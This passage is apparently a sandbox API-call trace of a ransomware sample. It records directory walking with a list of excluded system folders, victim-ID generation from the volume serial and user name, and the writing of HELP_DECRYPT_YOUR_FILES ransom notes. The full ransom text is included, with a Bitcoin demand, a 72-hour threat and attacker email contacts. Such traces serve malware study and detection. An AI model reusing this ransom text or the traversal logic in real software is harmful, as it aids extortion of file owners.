	[0200.054] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.054] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0200.055] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0200.055] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.055] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0200.055] CloseHandle (hObject=0x2c0) returned 1
	[0200.056] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b905640, ftCreationTime.dwHighDateTime=0x1d9755e, ftLastAccessTime.dwLowDateTime=0x90c36569, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90c5ca03, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0200.056] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*") returned 72
	[0200.056] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.056] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*", cchLength=0x48 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*") returned 0x48
	[0200.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.057] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="windows") returned 0x0
	[0200.057] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.057] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="boot") returned 0x0
	[0200.057] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.057] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="system volume information") returned 0x0
	[0200.057] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.057] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.058] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="temp") returned 0x0
	[0200.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.058] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="program files") returned 0x0
	[0200.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.058] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="program files (x86)") returned 0x0
	[0200.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.059] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="appdata") returned 0x0
	[0200.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.059] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="application data") returned 0x0
	[0200.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.059] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="winnt") returned 0x0
	[0200.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="tmp") returned 0x0
	[0200.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="cache") returned 0x0
	[0200.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="temporary internet files") returned 0x0
	[0200.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="webcache") returned 0x0
	[0200.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.061] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="inetcache") returned 0x0
	[0200.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.061] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="nvidia") returned 0x0
	[0200.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.061] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="packages") returned 0x0
	[0200.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.062] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="cookies") returned 0x0
	[0200.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.062] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="programdata") returned 0x0
	[0200.062] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0200.062] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0200.062] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b905640, ftCreationTime.dwHighDateTime=0x1d9755e, ftLastAccessTime.dwLowDateTime=0x90c36569, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90c5ca03, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0200.062] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0200.062] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x969c9090, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0xf1289650, ftLastAccessTime.dwHighDateTime=0x1d97158, ftLastWriteTime.dwLowDateTime=0xf1289650, ftLastWriteTime.dwHighDateTime=0x1d97158, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3zsYUlznS BE", cAlternateFileName="3ZSYUL~1")) returned 1
	[0200.063] lstrcmpW (lpString1="3zsYUlznS BE", lpString2="..") returned 1
	[0200.063] lstrcmpW (lpString1="3zsYUlznS BE", lpString2=".") returned 1
	[0200.063] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT"
	[0200.063] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0200.063] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\", lpString2="3zsYUlznS BE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE"
	[0200.063] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE"
	[0200.063] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\"
	[0200.063] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\"
	[0200.064] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*"
	[0200.134] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x969c9090, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0xf1289650, ftLastAccessTime.dwHighDateTime=0x1d97158, ftLastWriteTime.dwLowDateTime=0xf1289650, ftLastWriteTime.dwHighDateTime=0x1d97158, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0200.134] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*") returned 85
	[0200.134] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.135] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*") returned 0x55
	[0200.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.135] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="windows") returned 0x0
	[0200.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.135] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="boot") returned 0x0
	[0200.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.136] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="system volume information") returned 0x0
	[0200.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.136] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.136] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="temp") returned 0x0
	[0200.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.137] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="program files") returned 0x0
	[0200.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.137] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="program files (x86)") returned 0x0
	[0200.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.137] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="appdata") returned 0x0
	[0200.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.138] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="application data") returned 0x0
	[0200.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.138] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="winnt") returned 0x0
	[0200.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.138] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="tmp") returned 0x0
	[0200.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.139] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="cache") returned 0x0
	[0200.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.139] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="temporary internet files") returned 0x0
	[0200.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.139] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="webcache") returned 0x0
	[0200.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.140] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="inetcache") returned 0x0
	[0200.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.140] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="nvidia") returned 0x0
	[0200.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.140] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="packages") returned 0x0
	[0200.140] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.140] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="cookies") returned 0x0
	[0200.141] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.141] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="programdata") returned 0x0
	[0200.141] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x969c9090, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0xf1289650, ftLastAccessTime.dwHighDateTime=0x1d97158, ftLastWriteTime.dwLowDateTime=0xf1289650, ftLastWriteTime.dwHighDateTime=0x1d97158, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0200.141] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f8ce420, ftCreationTime.dwHighDateTime=0x1d968a6, ftLastAccessTime.dwLowDateTime=0x9821c9c0, ftLastAccessTime.dwHighDateTime=0x1d96a1c, ftLastWriteTime.dwLowDateTime=0x9821c9c0, ftLastWriteTime.dwHighDateTime=0x1d96a1c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JnTt-vV vFZHDMuv", cAlternateFileName="JNTT-V~1")) returned 1
	[0200.141] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x6fba25d0, ftLastAccessTime.dwHighDateTime=0x1d9764d, ftLastWriteTime.dwLowDateTime=0x6fba25d0, ftLastWriteTime.dwHighDateTime=0x1d9764d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KcTv Nkg6", cAlternateFileName="KCTVNK~1")) returned 1
	[0200.141] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x6fba25d0, ftLastAccessTime.dwHighDateTime=0x1d9764d, ftLastWriteTime.dwLowDateTime=0x6fba25d0, ftLastWriteTime.dwHighDateTime=0x1d9764d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KcTv Nkg6", cAlternateFileName="KCTVNK~1")) returned 0
	[0200.141] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0200.142] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0200.143] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE"
	[0200.143] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*"
	[0200.143] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.143] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.144] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\HELP_DECRYPT_YOUR_FILES.TXT") returned 109
	[0200.144] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0200.149] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0200.149] WriteFile (in: hFile=0x388, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0200.151] CloseHandle (hObject=0x388) returned 1
	[0200.152] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.152] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0200.153] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0200.154] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0200.154] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0200.154] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0200.154] WriteFile (in: hFile=0x388, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0200.155] CloseHandle (hObject=0x388) returned 1
	[0200.155] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.155] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
